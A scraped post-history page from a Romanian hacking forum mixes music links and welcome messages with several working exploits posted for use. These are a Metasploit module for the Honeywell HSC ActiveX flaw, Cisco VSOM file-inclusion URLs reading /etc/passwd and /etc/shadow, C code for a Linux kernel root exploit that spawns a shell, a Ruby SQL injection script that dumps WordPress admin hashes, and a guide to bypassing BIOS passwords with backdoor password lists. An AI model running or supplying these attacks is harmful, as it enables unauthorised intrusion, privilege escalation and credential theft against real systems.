Gonzalez
-
Posts
1576 -
Joined
-
Last visited
-
Days Won
9
Posts posted by Gonzalez
-
-
Bine ca sunt infectate PC-urile americanilor, unde is multi bani.
-Gonzalez
-
Metallica - Die Die My Darling.mp3
-Gonzalez
-
Ontopic: Am vazut cat de supermani sunteti. Dar voi nici macar atat nu ati facut cat au facut cei doi, si mai vorbiti de iceman ca nu are dinti un gura si ca a aparut pe TV. Voi daca ati fi urati cu cosuri si asa mai departe tot ati fi acceptat invitatia celor de la Pro TV sa fiti pe sticla.
Asa ca nu mai comentati fara rost.
-Gonzalez
-
Ce urat e jocul ala ^
-Gonzalez
-
Ice Cube - It Was A Good Day (HD)
-Gonzalez
-
-
Parazitii - Super Sclavi.mp3
-Gonzalez
-
Foarte bun postul.
-Gonzalez
-
Bun venit pe RST.
-Gonzalez
-
Bun venit pe RST.
-Gonzalez
-
Torsten Kanzler - Rock und Roll
-Gonzalez
-
Bun venit pe RST.
-Gonzalez
-
Chris Liebing & Speedy J (Collabs) @ Lehmann Club,Germany (21.04.2012)
-Gonzalez
-
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
'Name' => "Honeywell HSC Remote Deployer ActiveX Remote Code Execution",
'Description' => %q{
This modules exploits a vulnerability found in the Honewell HSC Remote Deployer
ActiveX. This control can be abused by using the LaunchInstaller() function to
execute an arbitrary HTA from a remote location. This module has been tested
successfully with the HSC Remote Deployer ActiveX installed with HoneyWell EBI
R410.1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'juan vazquez'
],
'References' =>
[
[ 'CVE', '2013-0108' ],
[ 'OSVDB', '90583' ],
[ 'BID', '58134' ],
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/03/11/cve-2013-0108-honeywell-ebi' ],
[ 'URL', 'http://ics-cert.us-cert.gov/pdf/ICSA-13-053-02.pdf' ]
],
'Payload' =>
{
'Space' => 2048,
'StackAdjustment' => -3500
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f -k'
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ]
],
'Privileged' => false,
'DisclosureDate' => "Feb 22 2013",
'DefaultTarget' => 0))
end
def exploit
@var_exename = rand_text_alpha(5 + rand(5)) + ".exe"
@dropped_files = [
@var_exename
]
super
end
def on_new_session(session)
if session.type == "meterpreter"
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
end
@dropped_files.delete_if do |file|
win_file = file.gsub("/", "\\\\")
if session.type == "meterpreter"
begin
wintemp = session.fs.file.expand_path("%TEMP%")
win_file = "#{wintemp}\\#{win_file}"
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
session.fs.file.rm(win_file)
print_good("Deleted #{file}")
true
rescue ::Rex::Post::Meterpreter::RequestError
print_error("Failed to delete #{win_file}")
false
end
end
end
end
def build_hta(cli)
var_shellobj = rand_text_alpha(rand(5)+5);
var_fsobj = rand_text_alpha(rand(5)+5);
var_fsobj_file = rand_text_alpha(rand(5)+5);
var_vbsname = rand_text_alpha(rand(5)+5);
var_writedir = rand_text_alpha(rand(5)+5);
var_origLoc = rand_text_alpha(rand(5)+5);
var_byteArray = rand_text_alpha(rand(5)+5);
var_writestream = rand_text_alpha(rand(5)+5);
var_strmConv = rand_text_alpha(rand(5)+5);
p = regenerate_payload(cli);
exe = generate_payload_exe({ :code => p.encoded })
# Doing in this way to bypass the ADODB.Stream restrictions on JS,
# even when executing it as an "HTA" application
# The encoding code has been stolen from ie_unsafe_scripting.rb
print_status("Encoding payload into vbs/javascript/hta...");
# Build the content that will end up in the .vbs file
vbs_content = Rex::Text.to_hex(%Q|
Dim #{var_origLoc}, s, #{var_byteArray}
#{var_origLoc} = SetLocale(1033)
|)
# Drop the exe payload into an ansi string (ansi ensured via SetLocale above)
# for conversion with ADODB.Stream
vbs_ary = []
# The output of this loop needs to be as small as possible since it
# gets repeated for every byte of the executable, ballooning it by a
# factor of about 80k (the current size of the exe template). In its
# current form, it's down to about 4MB on the wire
exe.each_byte do |b|
vbs_ary << Rex::Text.to_hex("s=s&Chr(#{("%d" % })\n")
end
vbs_content << vbs_ary.join("")
# Continue with the rest of the vbs file;
# Use ADODB.Stream to convert from an ansi string to it's byteArray equivalent
# Then use ADODB.Stream again to write the binary to file.
#print_status("Finishing vbs...");
vbs_content << Rex::Text.to_hex(%Q|
Dim #{var_strmConv}, #{var_writedir}, #{var_writestream}
#{var_writedir} = WScript.CreateObject("WScript.Shell").ExpandEnvironmentStrings("%TEMP%") & "\\#{@var_exename}"
Set #{var_strmConv} = CreateObject("ADODB.Stream")
#{var_strmConv}.Type = 2
#{var_strmConv}.Charset = "x-ansi"
#{var_strmConv}.Open
#{var_strmConv}.WriteText s, 0
#{var_strmConv}.Position = 0
#{var_strmConv}.Type = 1
#{var_strmConv}.SaveToFile #{var_writedir}, 2
SetLocale(#{var_origLoc})|)
hta = <<-EOS
<script>
var #{var_shellobj} = new ActiveXObject("WScript.Shell");
var #{var_fsobj} = new ActiveXObject("Scripting.FileSystemObject");
var #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings("%TEMP%");
var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs",2,true);
#{var_fsobj_file}.Write(unescape("#{vbs_content}"));
#{var_fsobj_file}.Close();
#{var_shellobj}.run("wscript.exe " + #{var_writedir} + "\\\\" + "#{var_vbsname}.vbs", 1, true);
#{var_shellobj}.run(#{var_writedir} + "\\\\" + "#{@var_exename}", 0, false);
#{var_fsobj}.DeleteFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs");
window.close();
</script>
EOS
return hta
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
if agent !~ /MSIE \d/
print_error("Browser not supported: #{agent.to_s}")
send_not_found(cli)
return
end
uri = ((datastore['SSL']) ? "https://" : "http://")
uri << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST'])
uri << ":#{datastore['SRVPORT']}"
print_status("Request received for #{request.uri}");
if request.uri =~ /\/SystemDisplays\/RemoteInstallWelcome.hta/
hta = build_hta(cli)
print_status("Sending HTA application")
send_response(cli, hta, {'Content-Type'=>'application/hta'})
return
end
html = <<-EOS
<html>
<body>
<object id="RemoteInstaller" classid="clsid:0D080D7D-28D2-4F86-BFA1-D582E5CE4867">
</object>
<script>
RemoteInstaller.LaunchInstaller("#{uri}", "", false);
</script>
</body>
</html>
EOS
# we need to handle direct /SystemDisplays/RemoteInstallWelcome.hta requests
proc = Proc.new do |cli, req|
on_request_uri(cli, req)
end
add_resource({'Path' => "/SystemDisplays/RemoteInstallWelcome.hta", 'Proc' => proc}) rescue nil
print_status("Sending html")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
end -
# Exploit Title:Cisco Video Surveillance Operations Manager Multiple
vulnerabilities
# Google Dork: intitle:"Video Surveillance Operations Manager > Login"
# Date: 22 Feb 2013 reported to the vendor
# Exploit Author: Bassem | bassem.co
# Vendor Homepage: www.cisco.com
# Version: Version 6.3.2
# Tested on: Version 6.3.2
#1- The application is vulnerable to Local file inclusion
read_log.jsp and read_log.dep not validate the name and location of the log
file , un authenticated remote attacker can perform this
---------------------------------------------
read_log.jsp:
/usr/BWhttpd/root/htdocs/BWT/utils/logs
from /usr/BWhttpd/logs/<%= logName %>
---------------------------------------------
---------------------------------------------
read_log.dep
<%!
protected LinkedList getBwhttpdLog( String logName, String theOrder
) {
String logPath = "/usr/BWhttpd/logs/";
String theLog = logPath + logName;
LinkedList resultList = new LinkedList();
try {
BufferedReader in = new BufferedReader(new
FileReader(theLog));
String theLine = "";
while( (theLine = in.readLine()) !=
null ) {
if(
theOrder.indexOf("descending") > -1 ) {
resultList.addFirst(theLine);
} else {
resultList.addLast(theLine);
}
}
-----------------------------------------------
POC:
http://serverip/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/passwd
http://serverip/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/shadow
#####################################################################
#2- The application is vulnerable to local file inclusion
select and display log not validate the log file names , If attacker pass
/etc/passwd through the http post request system will display it as log
file
POC:
http://serverip/monitor/logselect.php
#####################################################################
#3 Cisco Video Surveillance Operations Manager Version 6.3.2 doesn't
perform the proper authentication for the management and view console,
Remote attacker can gain access to the system and view the attached cameras
without authentication
POC:
http://serverip/broadware.jsp
#####################################################################
#4 Application is vulnerable to XSS
The web application doesn't perform validation for the inputs/outputs for
many of its pages so its vulnerable to XSS attacks
POC: http://serverip/vsom/index.php/
"/title><script>alert("ciscoxss");</script>
--
Best Regards
Bassem -
Local root exploit for Fedora 18 x86_64 using nl_table to leverage the sock_diag_handlers[] vulnerability.
/*
* CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8
* This exploit uses nl_table to jump to a known location
*/
#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <netinet/tcp.h>
#include <errno.h>
#include <linux/if.h>
#include <linux/filter.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <linux/sock_diag.h>
#include <linux/inet_diag.h>
#include <linux/unix_diag.h>
#include <sys/mman.h>
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;
int __attribute__((regparm(3)))
kernel_code()
{
commit_creds(prepare_kernel_cred(0));
return -1;
}
unsigned long
get_symbol(char *name)
{
FILE *f;
unsigned long addr;
char dummy, sym[512];
int ret = 0;
f = fopen("/proc/kallsyms", "r");
if (!f) {
return 0;
}
while (ret != EOF) {
ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym);
if (ret == 0) {
fscanf(f, "%s\n", sym);
continue;
}
if (!strcmp(name, sym)) {
printf("[+] resolved symbol %s to %p\n", name, (void *) addr);
fclose(f);
return addr;
}
}
fclose(f);
return 0;
}
int main(int argc, char*argv[])
{
int fd;
unsigned family;
struct {
struct nlmsghdr nlh;
struct unix_diag_req r;
} req;
char buf[8192];
if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
printf("Can't create sock diag socket\n");
return -1;
}
memset(&req, 0, sizeof(req));
req.nlh.nlmsg_len = sizeof(req);
req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
req.nlh.nlmsg_seq = 123456;
req.r.udiag_states = -1;
req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;
commit_creds = (_commit_creds) get_symbol("commit_creds");
prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
sock_diag_handlers = get_symbol("sock_diag_handlers");
nl_table = get_symbol("nl_table");
if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table){
printf("some symbols are not available!\n");
exit(1);
}
family = (nl_table - sock_diag_handlers) / 8;
printf("family=%d\n",family);
req.r.sdiag_family = family;
if(family>255){
printf("nl_table is too far!\n");
exit(1);
}
unsigned long mmap_start, mmap_size;
mmap_start = 0x100000000;
mmap_size = 0x200000;
printf("mmapping at 0x%lx, size = 0x%lx\n", mmap_start, mmap_size);
if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
printf("mmap fault\n");
exit(1);
}
memset((void*)mmap_start, 0x90, mmap_size);
char jump[] = "\x55" // push %ebp
"\x48\x89\xe5" // mov %rsp, %rbp
"\x48\xc7\xc0\x00\x00\x00\x00" // movabs 0x00, %rax
"\xff\xd0" // call *%rax
"\x5d" // pop %rbp
"\xc3"; // ret
unsigned int *asd = (unsigned int*) &jump[7];
*asd = (unsigned int)kernel_code;
printf("&kernel_code = %x\n", (unsigned int) kernel_code);
memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump));
if ( send(fd, &req, sizeof(req), 0) < 0) {
printf("bad send\n");
close(fd);
return -1;
}
printf("uid=%d, euid=%d\n",getuid(), geteuid() );
if(!getuid())
system("/bin/sh");
} -
CHRIS LIEBING Live @ CLR London Warehouse Party 24-11-2012
-Gonzalez
-
Vin adevaratii hackeri la TV. Iceman nici nu stie sa vorbeasca romaneste.
-Gonzalez
-
Metallica - Leper Messiah.mp3
-Gonzalez
-
Bun venit pe RST.
-Gonzalez
-
Iron Maiden - Out of The Shadows
-Gonzalez
-
http://reviews.cnet.com/2300-6452_7-10016134.html
LE: damn, seamana prea tare cu S3
-Gonzalez
-
#!/usr/bin/ruby
#
# Exploit Title: WordPress LeagueManager Plugin v3.8 SQL Injection
# Google Dork: inurl:"/wp-content/plugins/leaguemanager/"
# Date: 13/03/13
# Exploit Author: Joshua Reynolds
# Vendor Homepage: http://wordpress.org/extend/plugins/leaguemanager/ (No longer active)
# Software Link: http://downloads.wordpress.org/plugin/leaguemanager.3.8.zip (No longer active)
# Version: 3.8
# Tested on: BT5R1 - Ubuntu 10.04.2 LTS
# CVE: CVE-2013-1852
#-----------------------------------------------------------------------------------------
#Description:
#
#An SQL Injection vulnerability exists in the league_id parameter of a function call made
#by the leaguemanager_export page. This request is processed within the leaguemanager.php:
#
#if ( isset($_POST['leaguemanager_export']))
# $lmLoader->adminPanel->export($_POST['league_id'], $_POST['mode']);
#
#Which does not sanitize of SQL injection, and is passed to the admin/admin.php page
#into the export( $league_id, $mode ) function which also does not sanitize for SQL injection
#when making this call: $this->league = $leaguemanager->getLeague($league_id);
#The information is then echoed to a CSV file that is then provided.
#
#Since no authentication is required when making a POST request to this page,
#i.e /wp-admin/admin.php?page=leaguemanager-export the request can be made with no established
#session.
#
#Fix:
#
#A possible fix for this would be to cast the league_id to an integer during any
#of the function calls. The following changes can be made in the leaguemanager.php file:
#$lmLoader->adminPanel->export((int)$_POST['league_id'], $_POST['mode']);
#
#These functions should also not be available to public requests, and thus session handling
#should also be checked prior to the requests being processed within the admin section.
#
#The responsible disclosure processes were distorted by the fact that the author no longer
#supports his well established plugin, and there are currently no maintainers. After
#e-mailing the folks over at plugins@wordpress.org they've decided to discontinue the plugin
#and not patch the vulnerability.
#
#The following ruby exploit will retrieve the administrator username and the salted
#password hash from a given site with the plugin installed:
#------------------------------------------------------------------------------------------
#Exploit:
require 'net/http'
require 'uri'
if ARGV.length == 2
post_params = {
'league_id' => '7 UNION SELECT ALL user_login,2,3,4,5,6,7,8,'\
'9,10,11,12,13,user_pass,15,16,17,18,19,20,21,22,23,24 from wp_users--',
'mode' => 'teams',
'leaguemanager_export' => 'Download+File'
}
target_url = ARGV[0] + ARGV[1] + "/wp-admin/admin.php?page=leaguemanager-export"
begin
resp = Net::HTTP.post_form(URI.parse(target_url), post_params)
rescue
puts "Invalid URL..."
end
if resp.nil?
print_error "No response received..."
elsif resp.code != "200"
puts "Page doesn't exist!"
else
admin_login = resp.body.scan(/21\t(.*)\t2.*0\t(.*)\t15/)
if(admin_login.length > 0)
puts "Username: #{admin_login[0][0]}"
puts "Hash: #{admin_login[0][1]}"
puts "\nNow go crack that with Hashcat :)"
else
puts "Username and hash not received. Maybe it's patched?"
end
end
else
puts "Usage: ruby LeagueManagerSQLI.rb \"http://example.com\" \"/wordpress\""
end
#Shout outs: Graycon Group Security Team, Red Hat Security Team, Miss Umer, Tim Williams, Dr. Wu, friends & family.
#
#Contact:
#Mail: infosec4breakfast@gmail.com
#Blog: infosec4breakfast.com
#Twitter: @jershmagersh
#Youtube: youtube.com/user/infosec4breakfast -
Mie nu-mi place, acum vad poza. Nu ma impresioneaza cu nimic.
-Gonzalez
ajutor
in Sisteme de operare si discutii hardware
Posted
BIOS passwords are used to add some extra security to computers. You can either set a password to prevent access to BIOS settings or to prevent PC from booting.
But sometimes this extra security might become a pain when you forget the BIOS password or someone changes your system BIOS password intentionally.
But there is no need to worry. There are many known ways to reset / remove / bypass the password:
By removing CMOS battery
By using motherboard jumper
By using MS DOS command
By using software
By using Backdoor BIOS password
Now I'll try to explain each method one by one:
DISCLAIMER: This information is intended for experienced users. It is not intended for basic users, hackers, or computer thieves. Please do not try any of following procedures if you are not familiar with computer hardware. We'll not be responsible for the use or misuse of this information, including personal injury, loss of data or hardware damage. So use it at your own risk.
By Removing CMOS Battery:
Almost all motherboards use a small coin sized CMOS battery to store all BIOS settings along with the password. To reset the password, unplug the PC, open the cabinet and remove the CMOS battery for approx. 15-30 minutes and then put it back. It'll reset all BIOS settings as well as the password and you'll need to re-enter all settings.
If it fails, then try to remove the battery for at least one hour.
By Using Motherboard Jumper:
Almost all motherboards contain a jumper that can clear all CMOS settings along with the BIOS password. The location of this jumper varies depending upon the motherboard brand. You should read your motherboard manual to check its location. If you don't have the manual then look for the jumpers near the CMOS battery. Most of the manufacturer label the jumper as CLR, CLEAR, CLEAR CMOS, etc.
When you find the jumper, look carefully. There will be 3 pins and the jumper will be joining the center pin to either left or right pin. What you need to do, is remove the jumper and join the center pin to the opposite pin. e.g. if the jumper joins center pin to left pin, then remove it and join center pin to right pin. Now wait for a few seconds and then again remove the jumper and join the center pin to left pin.
Make sure to turn the PC off before opening the cabinet and resetting the jumper.
By Using MS DOS Command:
This method works only if you have access to the system when its turned on because this method requires MS DOS. Open Command Prompt from Programs menu and provide following commands one bye one:
debug
o 70 2E
o 71 FF
quit
NOTE: The first character in the above commands is English alphabet "o" and not the number 0.
After providing the above commands, restart your system and it should reset the CMOS Settings along with the BIOS password.
If you are curious to know how it works? then let me explain the above commands:
In this method we are using the Debug tool of MS DOS. The "o" character present at first in these commands, outputs the values to IO ports. The number 70 and 71 are port numbers which are used to access CMOS memory. By providing FF value we are telling CMOS that there is an invalid checksum and it resets the CMOS settings as well as BIOS password.
By Using Software:
There are a few software which can also reset CMOS settings or BIOS password or both within a few clicks. But as stated above you should have access to a system which is turned on and should have access to MS DOS or MS Windows:
CmosPwd
KillCMOS
By Using Backdoor BIOS Password:
Some BIOS manufacturer put a backdoor password in BIOS which always works irrespective of what password you have set in BIOS. Its a master password which is used for testing and troubleshooting purposes.
AMI BIOS Passwords:
A.M.I.
AAAMMMIII
AMI?SW
AMI_SW
AMI
BIOS
CONDO
HEWITT RAND
LKWPETER
MI
Oder
PASSWORD
AWARD BIOS Passwords:
01322222
589589
589721
595595
598598
ALFAROME
ALLy
aLLy
aLLY
ALLY
aPAf
_award
award
AWARD_SW
AWARD?SW
AWARD SW
AWARD PW
AWKWARD
awkward
BIOSTAR
CONCAT
CONDO
Condo
d8on
djonet
HLT
J64
J256
J262
j332
j322
KDD
Lkwpeter
LKWPETER
PINT
pint
SER
SKY_FOX
SYXZ
syxz
shift + syxz
TTPTHA
ZAAADA
ZBAAACA
ZJAAADC
PHOENIX BIOS Passwords:
BIOS
CMOS
phoenix
PHOENIX
Misc Common Passwords:
ALFAROME
BIOSTAR
biostar
biosstar
CMOS
cmos
LKWPETER
lkwpeter
setup
SETUP
Syxz
Wodj
Other Manufacturer BIOS Passwords:
Biostar - Biostar
Compaq - Compaq
Dell - Dell
Enox - xo11nE
Epox - central
Freetech - Posterie
IWill - iwill
Jetway - spooml
Packard Bell - bell9
QDI - QDI
Siemens - SKY_FOX
TMC - BIGO
Toshiba - Toshiba
VOBIS & IBM - merlin
NOTE: All these passwords are case-sensitive and are changed from time to time by manufacturers.